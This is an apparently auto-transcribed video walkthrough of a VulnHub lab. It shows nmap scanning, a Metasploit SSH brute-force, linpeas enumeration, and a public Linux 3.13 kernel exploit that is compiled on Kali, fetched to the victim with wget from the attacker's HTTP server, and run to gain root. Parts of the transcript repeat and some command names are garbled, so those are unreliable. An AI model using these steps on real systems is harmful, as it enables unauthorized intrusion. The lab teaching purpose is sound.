Hi guys, in this video I'm going to demonstrate how to successfully compromise a Linux machine downloaded from vulnhub.com. As you can see on the screen, the web address is there at the top, and the goal of this activity is to get the root shell and then obtain a flag under /root. So once you complete that, you successfully compromise the machine. So that's what I'm going to demonstrate to you. And before we proceed, I would just like to let you know that this video is for educational purposes only. And if you I would like to remind you not to use it for any malicious intent. I mean, it can get you into trouble. So just make sure, don't do it for, use it for only good cause only. If you are planning to appear for some of the exams, penetration testing exams, this is a good video. But if you want to use it to actually hack someone else's network, then I don't think it's a good idea. Okay, so the first thing we need to do is before we proceed, we need to find the IP address of this machine. So sudo ifconfig should reveal the IP address. 192.168.221.129 is the IP address of this machine. And depending upon how your network is set up, you might have a different IP address on your machine. So you'll have to find the first thing you need to do is find the IP address of the Ubuntu machine where you can start scanning the network, right? So what I'll do is I'll just as I know the subnet mask, I'll use a command, simple command, 192.168.221.0/24. so it scans all the IP addresses in that specific subnet mask. So press enter, and then it shows that there are two, or okay, so I can see the first IP address is 192.168.221.1, which is the IP address of this the host machine. I'm using Windows 10 in this one. And the second one is 192.168.221.2, which is the gateway IP address. And then the third one is the IP address of the Kali machine. And the fourth one is the IP address of the Ubuntu machine, which is 192.168.221.131. So now that we know the IP address of the machine, what we need to do is okay, so what we need to do is scan it to find what open ports are there, right? So first of all, I'll clear it before we do anything. So nmap -v-a, so it scans for everything, operating system, services running on that one, ports, open ports, and everything. And make sure that you use /-b as well, so that way it not only scans for the first 1,000 ports, but it will scan for all the ports in that specific machine, right? So the IP address is known, 192.168.221.131, and press enter. So we can see that there are two open ports already, 80 and 7120, and okay, so yeah, so it's already there. So port 80 is open, HTTP service is running on that one, and 7120 with SSH port open. So okay, so what we do next is so what I'll be doing is I'll be using brute force to log into the Ubuntu machine using MSF console. There are many ways you can do it. You can use MSF console. There is a tool called Hydra you can use for brute force, and then you can use nmap as well. But for this specific video, I'll be using MSF console. Okay, so let me clear that and start MSF console. Sometimes it takes a while to start, so I'll pause the video and start again. Okay, now we are inside MSF console. So the first thing we need to do is, because we are trying to execute an attack brute force attack on SSH port, secure shell port. So what I'll do is I'll search for an exploit for SSH, right? So there are loads of them. I can see loads of them, but the one I'm planning to use is this one, number 18, auxiliary scanner SSH /SSH _ login. So that's what I'm going to use. So I'll copy this one so that I won't have to type everything. So what I'll do is the command is use, paste this one, paste clipboard, and then I got 18 as well, so I'll get rid of that, use, and then press enter. Now what you do is you have to type in options to see what configurations you need to do execute this attack. So there are loads of different some are mandatory and some are just there optional. You don't need to configure them at all. So what I'll do is so I'll start with the password file. So in this case, because I have a password file, I'll use passfile slash top pass and options, and then as you can see, pass file has been set to top pass, and user file, set user file to users, and then set our hosts to 192.168.221.131. our port, we know that, so that's our port is 7120. Make sure that you type in the right port number, and then stop on success, we need to set it to true. So set stop on success to true, and then set verbose to true as well. Okay, so options. So final check before we execute the attack. So okay, brute force speed is 5, which is the highest it can go to. Our port is 7120. 192.168.221.131 is the IP address. Stop on success, true, and user pass, users is there, and top pass is there. Okay, so what I'll do is I'll type in run. Okay, so I can see there is a problem. So what I need to do is define absolute path to those specific files. So let me find that. I'll pause the video for some time, and once I figure out, I'll start it again. Okay, so what we need to do here is set pass file to home /kali/desktop /top pass and set user file to same home Kali desktop users. Okay, options. So now you can see the whole path to the file is there, so it should be good. Okay, I'll run it again, and okay, so it has started brute force already. So because the hint on the exercise, like the hint on the Vulnhub website says that potato, if I fail, then I need to use potato, look for the, come up with the usernames and passwords with potato in them. So that's why I have like most of the I have used an online tool to generate those usernames with potato in them, and then the top pass file has all the passwords. As you can see, the first option was potato care and the password was doc failed, and then it's going through each and every entry in those specific files. It might take a while, so I'll just pause it till it is successful. And just to give you an idea, depending upon how many passwords you have in the password file and the username in the users file, it can take from 5 minutes to a couple of hours as well. So I'll start this video once I get a match. Okay, so we finally got a match, and the success is, as you can see, the password and the username. So what I'll do is I'll check what the session is. So it might take a while. Okay, sessions. Okay, so the session has been established here with the Ubuntu machine. So what I need to do is basically establish a connection with the machine using command session-i. The ID is 3, so I'll have to use 3 as an ID and then press enter. And after some time, okay, session stats I3. Okay, so now we got the session established. So what I can do is I can run commands remotely on that specific machine. So if I do pwd, I can see the home /potato on my screen. Okay, so the next thing to do is, the key to solving this problem is finding a directory from where we can execute additional commands to successfully compromise this machine. So what I'll do is I'll go to the parent directory. So cd cd/ls. Okay, so in this one, let's do ls-al, which shows all the permissions on the directories. So I should be able to find a directory where I can execute commands from. So temp is the directory where all the users have read, write and execute privileges. So that will be the directory we'll be focusing on to solve this problem. So the next thing I'll do is switch to cd/temp ls. So there is only one file or directory there. So if I want to check further details regarding that, I can do that. Okay, there are a few other hidden files as well, which we are not worried about. So what I'll do is I'll download a script called linpis, which is Linux privilege escalation awesome script. So I'll download that from GitHub, and then we'll go from there. Okay, so what I'll do next is go to the github.com and then copy the URL from where I can download the linpis script, and go to Kali and then type in command wget, paste the URL and then press enter. So if I check it, I should see the linpis.sh script here. So currently, as you can see, there is no execute permission on this file. So what I'll do is I'll give it a execute permission, chmod +x, and then linpis.sh. So now if I check it again, ls-al, So there is execute permission on this file. Basically, with this script, what happens is it gives you all the information regarding the system that we have compromised, like logged into the Ubuntu machine. It will give all the information regarding the compromised machine. So the next thing is to execute the file. To execute that, I'll do // and then linpiece .sh. And as you can see, the script is running. It might take a while, so yeah, still going on. And then it gives all the information regarding the machine. So the information, so yeah, it's very helpful to find information regarding the vulnerabilities of the system once you get the version number of the software and Linux kernel version and things like that. So okay, the next thing, upon investigation, I found that kernel version was 3.130-24 generic. So based on that, there is a vulnerability associated with that kernel, right? So what I'll do is I'll look for an exploit that can be used to basically compromise this version of the kernel in the Ubuntu machine. Okay, so if I go to the exploitdb.com and search for Linux kernel 3.13.0, and it should come up with a vulnerability exploit associated with that, right? So what I'll do is I'll download it and then save it in my Kali machine. And then go back to Kali downloads, and if I do ls, then yeah, there is 37292.c, right? So what I need to do next is, since this is a C source file, I need to compile this file, gcc 37292.c. The output file -o is exploit1. Okay, once I do that and do ls, I should see exploit1 there. So the next thing to do is use set up a simple web server on Kali using command -m simple http server on port 2020. Press enter. So it has started now. So what I need to do is from the other command prompt, I need to download that file to the compromised machine. And once you get the simple HTTP web server ready, what you need to do is from the compromised machine, type in command wget http //192.168.221.129 port number / and then exploit1, and you can see that the file has downloaded. In this one, I had to try it a couple of times because of some issues with the download. So the next thing you do is exploit1, okay, so pwd Okay, so the thing is that there is a problem with this one. Okay, and once you get the simple HTTP web server ready, what you need to do is from the compromised machine, type in command wget http //192.168.221.129 port number / and then exploit 1, and you can see that the file has downloaded. In this one I had to try a couple of times because of some issues with the download. So the next thing you do is exploit 1, okay, so pwd, it's in the, okay, so the thing is that there is a problem with this one. Okay, so what I'll do next is ls-al, and as you can see, exploit 1 doesn't have execute right in this privilege in this machine, in this folder. So what I'll do is I'll do chmod +x exploit 1 and see. Okay, not ls-al, now it has execute permission. So what I'll do is dot exploit 1, and then if you type the pwd, you are in the root. So what I'll do is I will cd/root ls. Okay, so we got the root, and then now to complete this problem, so what we do is proof cat proof.proof.txt, and there's the proof, and that's it. So I hope you got something out of this video, and if you want to learn more about pen testing, then please subscribe to my channel, and if you have any questions, feel free to comment and I'll try to answer them for you. And lastly, thank you for watching.